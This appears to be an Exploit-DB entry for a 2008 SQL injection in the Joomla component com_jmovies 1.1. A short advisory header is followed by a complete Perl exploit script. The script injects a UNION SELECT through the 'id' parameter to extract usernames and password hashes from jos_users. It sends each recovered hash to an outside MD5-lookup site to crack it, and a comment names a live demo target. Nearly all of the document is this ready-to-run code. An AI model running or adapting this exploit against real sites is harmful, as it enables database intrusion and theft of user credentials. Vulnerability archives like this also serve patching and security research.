Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit

vendor:

com_jmovies

by:

s3rg3770 with athos

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_jmovies

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit

This exploit allows an attacker to inject malicious SQL queries into the vulnerable Joomla component com_jmovies 1.1. The attacker can use this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Upgrade to the latest version of Joomla component com_jmovies 1.1.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
# -----------------------------------------------------------
# Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit
# by s3rg3770 with athos :)
# demo http://www.disneyrama.com
# -----------------------------------------------------------
# Note: In lulz we trust :O
# -----------------------------------------------------------

use strict;
use LWP::UserAgent;
use LWP::Simple;


my $host = shift;
my $myid = shift or &help;

my $path = "/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+".
           "union+select+1,concat(0x215F,username,0x3a,password,0x215F)+".
           "from+jos_users+where+id=${myid}--";

my $http = new LWP::UserAgent(
                               agent   => 'Mozilla/4.5 [en] (Win95; U)',
                               timeout => '5',
                             );  


my $response = $http->get($host.$path); 

if($response->content =~ /!_(.+?)!_/i)
{
     print STDOUT "Hash MD5: $1\n";
     print STDOUT "Password: ".search_md5($1)."\n";
     exit;
}
else
{
     print STDOUT "Exploit Failed!\n";
     exit;
}



sub search_md5
{
     my $hash = shift @_;
     my $cont = undef;

     $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
        
     if(length($hash) < 32 && !is_error($cont))
     {
          return $cont;
     }
}   


sub help
{
     print STDOUT "Usage: perl $0 [host] [user ID]\n";
     print STDOUT "by athos - staker[at]hotmail[dot]it\n";
     exit;
}

# milw0rm.com [2008-12-03]